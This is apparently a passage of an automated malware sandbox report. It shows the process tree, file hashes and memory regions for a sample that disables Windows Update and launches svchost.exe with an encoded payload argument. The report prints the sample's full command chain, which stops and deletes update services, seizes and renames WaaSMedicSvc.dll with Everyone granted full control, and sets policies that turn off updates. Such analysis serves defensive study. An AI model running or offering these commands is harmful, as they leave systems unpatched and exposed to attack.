        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        PID:4320
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:4408
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:4748
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:4744
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:4108
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:4112
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:4264
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:1336
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies registry key
          PID:1956
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:2884
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1536
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:4560
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:4516
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:3644
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:4412
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:1820
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:4424
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:4556
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:4912
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:4936
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:4580
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:3000
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:4420
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:4540
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe
        PID:2128
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"
          PID:4380
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe hhmzomdryxklm1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKbhKEsyAtsV/R69zSzs3rP9kwrKtV5rbpmU/ciKPfPbhE9OKMMZXsI4UuRWZka8gS1s3HImYphWDV4wtqbeoHFj9g+eZNUoxfSBEn9L8w689dicSe5gi9g1CuCFLqyc7rwP/qjv/3JltIuH5LITKSCk7NXUnWeSDcKY+NEgVfPhJqoLEg0aeDg0KzxJrSUBDIJsbJWIc9iXONDbVMTVT325hS49GeGAI3OCMHKRR3rdOlsV6M9LUsKiFtUKe023Fiqki/2NFI17HEJ11UF+t6f3f98YUZokpWGVfv/F+VZIliwJaLVyzmm8cmJbvj/Kk9fw4aMKco/zTvKVFpN7WHBE5ihOAIdgLEtFFOECZ0VkdHbSg7zj8LXWP3XBDgZmT/PqsiIA0H3OwZNBjcY4rgjXQuml3y2wHeGb80pVVWBuMCIL8sCKDGpDbxiGDcBPcXfVWLdW+mS2VMIb3O/HlHhTYbdCuIHWH/bwUTs0vfQ83nR1mapBl3HhjShQnY40eZw0N1hMUMfCNjyNzWVgfBMhy9MwGaqnFJcQDpiYiVz61SrdLFCtpEnS3/kpJJXUzUBm0N2+JFiygLQGxw1SnSpP2EyTmdeaAN2uFWIS+BKCPJnp+Urs4ZIl3L86i6Tua4xkWIuaHTvQcBBqfq2BUHq/tLhHwx6yCrF/kfnl/5iXfLuCspUzlw6ZMz1cm2MDpBcOg1/gqzqrt+nyVDaTWBNnlqQtGRUYtUgvt5UXluuo835dbfAbWdkMMKIb7n2tZu2O5jsprX3nRnflrXNwa4aGTIlireC/ZpMF870p7vGDEFpva1T0Rd09ATLL1v8gEbuv8MViLO6cBi+L9jUR0yZfcdT7y8lHnRy/+8C79u/c9DjZfyQB8NJv62KZdxCwBzSeLR5MMSp11Y2skr66+YEXG2FRRWrXAlH2bZXv98TaPSbt0i43nk4Yz7s+ytCPFUNIeIoxV9ce2xdOpHqqFCtwT8eJ9EaMxFCuVWhNc9ECcQ2wJtJ2BTuhX2x4mJKeaQTai1sy8DVQYd52treWJZeQG+84IKsCqBOo4TZLL7GKMsSj+J3fMBL82oHYCVo/XwBH9fjo36EWBjibeA1qOBj3n8/hOcGirQ/WjUG5965/cSYWzjatv0njtxER7lnH9HMnXMsHXUpgPeDkQYQe8tWGkKJfOjKWvOKULJTdqwcjKrySMCAnwM23+lrIvjgkHDSFXzrE4bsgtfQQLgMvxtEV0uEXKS5q7oSkWyt2f8078oXmh5OhNyLJn6XCoGx/NQGZ8UxzjcKczeCotM0TNeWj+SABRXgkf1VUKrXmJ0CAlPIjguo+q4co87MqHySF8+C6J7s6n/f1l++/reoGTPOhnw7iNjxqQsdhFqi8WdxxhNztJR1CeWprsRqngRs4eZ0B2KyfMQDOnyRkBthFTsKUv8+JSQD5ORke/9r2kNBdlHH3NamvS16q1YsdXFYsvFCMrBnbCTsCu+tasasTw82VpHrmPvBHdUFcaccuCCLHfZL28RuT4oBeO3lR+nHIbW9b5laMXY0Dn9kqMFd7Vj66+/jyFUG1pVWHJgudOaJbM
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:4544
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Discovery
          Execution
            Exfiltration
              Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Program Files\Windows\services.exe

                      MD5

                      95104aa61ed30687c13e5c644d5722f3

                      SHA1

                      f9788f808044d448f73203d93da0021cefb781ff

                      SHA256

                      a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301

                      SHA512

                      99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

                    • C:\Program Files\Windows\services.exe

                      MD5

                      95104aa61ed30687c13e5c644d5722f3

                      SHA1

                      f9788f808044d448f73203d93da0021cefb781ff

                      SHA256

                      a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301

                      SHA512

                      99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                      MD5

                      84f2160705ac9a032c002f966498ef74

                      SHA1

                      e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

                      SHA256

                      7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

                      SHA512

                      f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

                    • memory/532-267-0x000002DD26AF0000-0x000002DD26AFA000-memory.dmp

                    • memory/532-213-0x0000000000000000-mapping.dmp

                    • memory/532-234-0x000002DD26EC0000-0x000002DD26F79000-memory.dmp

                    • memory/532-228-0x000002DD26AD0000-0x000002DD26AEC000-memory.dmp

                    • memory/1336-372-0x0000000000000000-mapping.dmp

                    • memory/1340-169-0x0000000000000000-mapping.dmp

                    • memory/1388-194-0x0000000000000000-mapping.dmp

                    • memory/1536-376-0x0000000000000000-mapping.dmp

                    • memory/1540-173-0x0000000000000000-mapping.dmp

                    • memory/1676-133-0x0000000000000000-mapping.dmp

                    • memory/1676-141-0x000002031C440000-0x000002031C4B6000-memory.dmp

                    • memory/1676-138-0x0000020303FF0000-0x0000020304012000-memory.dmp

                    • memory/1820-388-0x0000000000000000-mapping.dmp

                    • memory/1860-190-0x0000000000000000-mapping.dmp

                    • memory/1956-373-0x0000000000000000-mapping.dmp

                    • memory/2128-365-0x0000000000400000-0x000000000040C000-memory.dmp

                    • memory/2128-370-0x0000000000400000-0x000000000040C000-memory.dmp

                    • memory/2128-366-0x0000000000401BEA-mapping.dmp

                    • memory/2300-118-0x0000000000400000-0x0000000001119000-memory.dmp

                    • memory/2456-124-0x0000014733E10000-0x000001473422C000-memory.dmp

                    • memory/2456-128-0x0000014718DC0000-0x00000147191DC000-memory.dmp

                    • memory/2716-171-0x0000000000000000-mapping.dmp

                    • memory/2724-192-0x0000000000000000-mapping.dmp

                    • memory/2744-191-0x0000000000000000-mapping.dmp

                    • memory/2884-374-0x0000000000000000-mapping.dmp

                    • memory/3000-396-0x0000000000000000-mapping.dmp

                    • memory/3236-195-0x0000000000000000-mapping.dmp

                    • memory/3312-197-0x0000000000000000-mapping.dmp

                    • memory/3472-200-0x0000000000400000-0x0000000001119000-memory.dmp

                    • memory/3644-386-0x0000000000000000-mapping.dmp

                    • memory/3740-132-0x0000000000000000-mapping.dmp

                    • memory/3992-212-0x0000000000000000-mapping.dmp

                    • memory/4108-362-0x0000000000000000-mapping.dmp

                    • memory/4112-363-0x0000000000000000-mapping.dmp

                    • memory/4216-364-0x000001EAB9F00000-0x000001EAB9F06000-memory.dmp

                    • memory/4216-375-0x000001EAB9F30000-0x000001EAB9F42000-memory.dmp

                    • memory/4264-371-0x0000000000000000-mapping.dmp

                    • memory/4320-358-0x0000000000000000-mapping.dmp

                    • memory/4340-184-0x0000000000000000-mapping.dmp

                    • memory/4380-409-0x000001A8DE020000-0x000001A8DE027000-memory.dmp

                    • memory/4380-406-0x000001A8DE740000-0x000001A8DE746000-memory.dmp

                    • memory/4384-174-0x0000000000000000-mapping.dmp

                    • memory/4408-359-0x0000000000000000-mapping.dmp

                    • memory/4412-387-0x0000000000000000-mapping.dmp

                    • memory/4420-392-0x0000000000000000-mapping.dmp

                    • memory/4424-389-0x0000000000000000-mapping.dmp

                    • memory/4496-170-0x0000000000000000-mapping.dmp

                    • memory/4516-379-0x0000000000000000-mapping.dmp

                    • memory/4540-390-0x0000000000000000-mapping.dmp

                    • memory/4544-410-0x000001E0049E0000-0x000001E004A00000-memory.dmp

                    • memory/4544-397-0x0000000140000000-0x0000000140803000-memory.dmp

                    • memory/4544-400-0x000001E004980000-0x000001E0049C0000-memory.dmp

                    • memory/4544-384-0x000001E004920000-0x000001E004940000-memory.dmp

                    • memory/4544-382-0x0000000140000000-0x0000000140803000-memory.dmp

                    • memory/4544-383-0x0000000140000000-0x0000000140803000-memory.dmp

                    • memory/4544-380-0x0000000140000000-0x0000000140803000-memory.dmp

                    • memory/4544-381-0x000000014036DB84-mapping.dmp

                    • memory/4556-391-0x0000000000000000-mapping.dmp

                    • memory/4560-377-0x0000000000000000-mapping.dmp

                    • memory/4576-181-0x0000000000000000-mapping.dmp

                    • memory/4580-395-0x0000000000000000-mapping.dmp

                    • memory/4700-172-0x0000000000000000-mapping.dmp

                    • memory/4708-176-0x0000000000000000-mapping.dmp

                    • memory/4732-177-0x0000000000000000-mapping.dmp

                    • memory/4744-361-0x0000000000000000-mapping.dmp

                    • memory/4748-360-0x0000000000000000-mapping.dmp

                    • memory/4856-175-0x0000000000000000-mapping.dmp

                    • memory/4912-178-0x0000000000000000-mapping.dmp

                    • memory/4912-393-0x0000000000000000-mapping.dmp

                    • memory/4932-179-0x0000000000000000-mapping.dmp

                    • memory/4936-394-0x0000000000000000-mapping.dmp

                    • memory/4940-180-0x0000000000000000-mapping.dmp

                    • memory/4956-182-0x0000000000000000-mapping.dmp

                    • memory/4968-183-0x0000000000000000-mapping.dmp

                    • memory/4988-185-0x0000000000000000-mapping.dmp

                    • memory/5004-186-0x0000000000000000-mapping.dmp

                    • memory/5024-187-0x0000000000000000-mapping.dmp

                    • memory/5064-188-0x0000000000000000-mapping.dmp

                    • memory/5100-189-0x0000000000000000-mapping.dmp

                    • memory/5112-193-0x0000000000000000-mapping.dmp